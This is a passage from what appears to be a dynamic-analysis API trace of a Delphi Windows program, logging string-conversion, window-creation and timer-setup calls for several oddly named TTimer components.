(in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=4, lpWideCharStr=0x71d1668, cchWideChar=4 | out: lpWideCharStr="Leftp") returned 4 [0039.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x71ca29c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0039.715] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0039.715] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=3, lpWideCharStr=0x71d1668, cchWideChar=3 | out: lpWideCharStr="Toptp") returned 3 [0039.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x71ca35c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0039.715] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.715] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=6, lpWideCharStr=0x71d1668, cchWideChar=6 | out: lpWideCharStr="TTimerೠܝ\x02") returned 6 [0039.715] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.715] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=6, lpWideCharStr=0x71d1668, cchWideChar=6 | out: lpWideCharStr="tmrM8Uೠܝ\x02") returned 6 [0039.715] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6cb99c5, cbMultiByte=6, lpWideCharStr=0x71ca31c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0039.715] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0039.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4c1, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¢\x1c\x07çF\x95uÜ¢\x1c\x07\x88½\x0b", lpUsedDefaultChar=0x0) returned 0 [0039.715] GetClassInfoW (in: hInstance=0x6ba0000, lpClassName="TPUtilWindow", lpWndClass=0x68ff5c0 | out: lpWndClass=0x68ff5c0) returned 1 [0039.715] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x6ba0000, lpParam=0x0) returned 0x1015c [0039.715] SetWindowLongW (hWnd=0x1015c, nIndex=-4, dwNewLong=83758879) returned 112917644 [0039.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0039.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM8U", cchWideChar=6, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM8U", lpUsedDefaultChar=0x0) returned 6 [0039.716] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.716] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x71ca318, cchWideChar=7 | out: lpWideCharStr="Enabledr") returned 7 [0039.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Enabled", cchWideChar=7, lpMultiByteStr=0x71e026c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Enabled", lpUsedDefaultChar=0x0) returned 7 [0039.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="False", cchWideChar=5, lpMultiByteStr=0x71ca39c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="False", lpUsedDefaultChar=0x0) returned 5 [0039.716] KillTimer (hWnd=0x1015c, uIDEvent=0x1) returned 0 [0039.716] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0039.716] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=8, lpWideCharStr=0x71ca298, cchWideChar=8 | out: lpWideCharStr="Intervald") returned 8 [0039.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interval", cchWideChar=8, lpMultiByteStr=0x71e6d8c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Interval3", lpUsedDefaultChar=0x0) returned 8 [0039.716] KillTimer (hWnd=0x1015c, uIDEvent=0x1) returned 0 [0039.716] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.716] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x71ca318, cchWideChar=7 | out: lpWideCharStr="OnTimered") returned 7 [0039.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x71e01f4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0039.716] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0039.716] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=11, lpWideCharStr=0x71e01f0, cchWideChar=11 | out: lpWideCharStr="tmrM8UTimerg") returned 11 [0039.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM8UTimer", cchWideChar=11, lpMultiByteStr=0x68ff425, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM8UTimer\x0b", lpUsedDefaultChar=0x0) returned 11 [0039.716] KillTimer (hWnd=0x1015c, uIDEvent=0x1) returned 0 [0039.716] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0039.717] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=4, lpWideCharStr=0x71d1680, cchWideChar=4 | out: lpWideCharStr="Left敭r") returned 4 [0039.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x71ca31c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0039.717] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0039.717] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=3, lpWideCharStr=0x71d1680, cchWideChar=3 | out: lpWideCharStr="Topt敭r") returned 3 [0039.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x71ca29c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0039.717] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.717] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=6, lpWideCharStr=0x71d1680, cchWideChar=6 | out: lpWideCharStr="TTimer") returned 6 [0039.717] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0039.717] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=11, lpWideCharStr=0x71e0268, cchWideChar=11 | out: lpWideCharStr="tmrP3g48P4ger") returned 11 [0039.717] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6cb99c5, cbMultiByte=6, lpWideCharStr=0x71ca29c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0039.717] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0039.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4c1, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¢\x1c\x07çF\x95uÜ¢\x1c\x07\x88½\x0b", lpUsedDefaultChar=0x0) returned 0 [0039.717] GetClassInfoW (in: hInstance=0x6ba0000, lpClassName="TPUtilWindow", lpWndClass=0x68ff5c0 | out: lpWndClass=0x68ff5c0) returned 1 [0039.717] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x6ba0000, lpParam=0x0) returned 0x1015e [0039.718] SetWindowLongW (hWnd=0x1015e, nIndex=-4, dwNewLong=83758866) returned 112917644 [0039.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0039.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrP3g48P4g", cchWideChar=11, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrP3g48P4g", lpUsedDefaultChar=0x0) returned 11 [0039.718] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.718] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x71ca298, cchWideChar=7 | out: lpWideCharStr="Enabledr") returned 7 [0039.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Enabled", cchWideChar=7, lpMultiByteStr=0x71e026c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Enabled", lpUsedDefaultChar=0x0) returned 7 [0039.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="False", cchWideChar=5, lpMultiByteStr=0x71ca39c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="False", lpUsedDefaultChar=0x0) returned 5 [0039.718] KillTimer (hWnd=0x1015e, uIDEvent=0x1) returned 0 [0039.718] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.718] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x71ca378, cchWideChar=7 | out: lpWideCharStr="OnTimered") returned 7 [0039.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x71e026c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0039.718] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca298, cbMultiByte=16, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0039.718] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca298, cbMultiByte=16, lpWideCharStr=0x71e6d88, cchWideChar=16 | out: lpWideCharStr="tmrP3g48P4gTimerer晰ܞҰ\x02\x01") returned 16 [0039.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrP3g48P4gTimer", cchWideChar=16, lpMultiByteStr=0x68ff425, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrP3g48P4gTimer", lpUsedDefaultChar=0x0) returned 16 [0039.718] KillTimer (hWnd=0x1015e, uIDEvent=0x1) returned 0 [0039.718] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0039.718] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=4, lpWideCharStr=0x71d1668, cchWideChar=4 | out: lpWideCharStr="Left㑐g\x01") returned 4 [0039.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x71ca37c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0039.719] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0039.719] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=3, lpWideCharStr=0x71d1668, cchWideChar=3 | out: lpWideCharStr="Topt㑐g\x01") returned 3 [0039.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x71ca31c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0039.719] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.719] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=6, lpWideCharStr=0x71d1668, cchWideChar=6 | out: lpWideCharStr="TTimerೠܝ\x02") returned 6 [0039.719] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca318, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0039.719] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca318, cbMultiByte=13, lpWideCharStr=0x71e0268, cchWideChar=13 | out: lpWideCharStr="tmrCh3ck83rr0") returned 13 [0039.719] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6cb99c5, cbMultiByte=6, lpWideCharStr=0x71ca31c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0039.719] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0039.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4c1, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¢\x1c\x07çF\x95uÜ¢\x1c\x07\x88½\x0b", lpUsedDefaultChar=0x0) returned 0 [0039.719] GetClassInfoW (in: hInstance=0x6ba0000, lpClassName="TPUtilWindow", lpWndClass=0x68ff5c0 | out: lpWndClass=0x68ff5c0) returned 1 [0039.719] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x6ba0000, lpParam=0x0) returned 0x10160 [0039.720] SetWindowLongW (hWnd=0x10160, nIndex=-4, dwNewLong=83758853) returned 112917644 [0039.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0039.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrCh3ck83rr0", cchWideChar=13, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrCh3ck83rr0", lpUsedDefaultChar=0x0) returned 13 [0039.720] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.720] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x71ca318, cchWideChar=7 | out: lpWideCharStr="Enabledr") returned 7 [0039.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Enabled", cchWideChar=7, lpMultiByteStr=0x71e026c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Enabled", lpUsedDefaultChar=0x0) returned 7 [0039.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="False", cchWideChar=5, lpMultiByteStr=0x71ca39c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="False", lpUsedDefaultChar=0x0) returned 5 [0039.720] KillTimer (hWnd=0x10160, uIDEvent=0x1) returned 0 [0039.720] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0039.720] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=8, lpWideCharStr=0x71ca298, cchWideChar=8 | out: lpWideCharStr="Intervald") returned 8 [0039.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interval", cchWideChar=8, lpMultiByteStr=0x71e6e4c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Interval", lpUsedDefaultChar=0x0) returned 8 [0039.720] KillTimer (hWnd=0x10160, uIDEvent=0x1) returned 0 [0039.720] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.720] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x71ca318, cchWideChar=7 | out: lpWideCharStr="OnTimered") returned 7 [0039.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x71e0294, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0039.720] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca378, cbMultiByte=18, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18 [0039.720] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca378, cbMultiByte=18, lpWideCharStr=0x71e6e48, cchWideChar=18 | out: lpWideCharStr="tmrCh3ck83rr0Timer") returned 18 [0039.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrCh3ck83rr0Timer", cchWideChar=18, lpMultiByteStr=0x68ff425, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrCh3ck83rr0Timer", lpUsedDefaultChar=0x0) returned 18 [0039.721] KillTimer (hWnd=0x10160, uIDEvent=0x1) returned 0 [0039.721] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0039.721] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=4, lpWideCharStr=0x71d1680, cchWideChar=4 | out: lpWideCharStr="Leftp") returned 4 [0039.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x71ca31c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0039.721] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0039.721] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=3, lpWideCharStr=0x71d1680, cchWideChar=3 | out: lpWideCharStr="Toptp") returned 3 [0039.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x71ca29c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0039.721] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.721] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=6, lpWideCharStr=0x71d1680, cchWideChar=6 | out: lpWideCharStr="TTimer") returned 6 [0039.721] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0039.721] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=10, lpWideCharStr=0x71ca298, cchWideChar=10 | out: lpWideCharStr="tmrMB08st4馰ܜ朐ۆ") returned 10 [0039.721] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6cb99c5, cbMultiByte=6, lpWideCharStr=0x71ca29c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0039.721] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0039.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4c1, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¢\x1c\x07çF\x95uÜ¢\x1c\x07\x88½\x0b", lpUsedDefaultChar=0x0) returned 0 [0039.721] GetClassInfoW (in: hInstance=0x6ba0000, lpClassName="TPUtilWindow", lpWndClass=0x68ff5c0 | out: lpWndClass=0x68ff5c0) returned 1 [0039.721] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x6ba0000, lpParam=0x0) returned 0x10162 [0039.722] SetWindowLongW (hWnd=0x10162, nIndex=-4, dwNewLong=83758840) returned 112917644 [0039.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0039.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrMB08st4", cchWideChar=10, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrMB08st4", lpUsedDefaultChar=0x0) returned 10 [0039.722] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.722] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x71ca298, cchWideChar=7 | out: lpWideCharStr="Enabledr") returned 7 [0039.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Enabled", cchWideChar=7, lpMultiByteStr=0x71e026c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Enabled", lpUsedDefaultChar=0x0) returned 7 [0039.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="False", cchWideChar=5, lpMultiByteStr=0x71ca39c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="False", lpUsedDefaultChar=0x0) returned 5 [0039.722] KillTimer (hWnd=0x10162, uIDEvent=0x1) returned 0 [0039.722] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.722] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x71ca378, cchWideChar=7 | out: lpWideCharStr="OnTimered") returned 7 [0039.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x71e026c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0039.722] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca298, cbMultiByte=15, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 15 [0039.722] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca298, cbMultiByte=15, lpWideCharStr=0x71e6e48, cchWideChar=15 | out: lpWideCharStr="tmrMB08st4Timermer") returned 15 [0039.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrMB08st4Timer", 